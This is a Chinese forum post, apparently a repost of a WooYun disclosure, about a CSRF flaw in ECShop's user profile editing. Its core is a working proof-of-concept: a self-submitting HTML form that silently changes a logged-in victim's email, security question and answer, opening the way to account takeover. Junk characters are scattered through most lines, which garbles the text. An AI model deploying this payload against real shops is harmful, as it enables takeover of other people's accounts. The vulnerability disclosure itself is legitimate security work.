找回密码
 立即注册
查看: 2682|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
- Q+ K' r5 a+ ~: Xecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现, d* n) p/ G' V( A

! ?& d3 H  n" H( @Demo For:http://www.wooyun.org/bug.php?action=view&id=395; T. [/ i& A: P1 j0 q( E2 e+ e
, c7 s7 \' j/ D) u* \( p
详细说明:
& F3 [. M, Y! e/ m( U% F利用csrf和xss可以突破官方所说的“障碍”5 c; A3 Y5 s% _( P* P
xss版本已经有人说明) C5 K3 w+ O! M
这里给出csrf版本- }9 r2 q& u' P
! R3 v+ N  K8 s8 I5 {8 }! e
漏洞证明:
  w( C- R3 m7 }<html>9 A9 m6 H. U, o! @# `
<body>/ r) t0 r9 H; z7 F/ g# O" ]
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' D% T0 Q  Y, Z% |7 ^<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">. q% H; y% `5 V% Z% @
<INPUT TYPE="text" NAME="act" value="act_edit_profile">5 C: k4 r" J6 `) b- ?# Y
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
9 l. G  F' L6 z# f9 \<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
* y; f7 I7 g6 o7 S- x: E  p8 D</body>0 O5 f$ U! S  _  [, m# `
<script>
: V) i( O- B, Z# W% Zdocument.forms[0].submit();
5 I. [% \# z7 N, K4 i# @4 C  O</script>
# ^$ ~. j3 i% ~7 T</html>' f( V' v) Y. r1 r5 o6 B/ a8 |
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
1 q* |2 ^0 O% @. n: `2 @
$ v7 e) }8 ~) L5 p1 c* X' y& v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表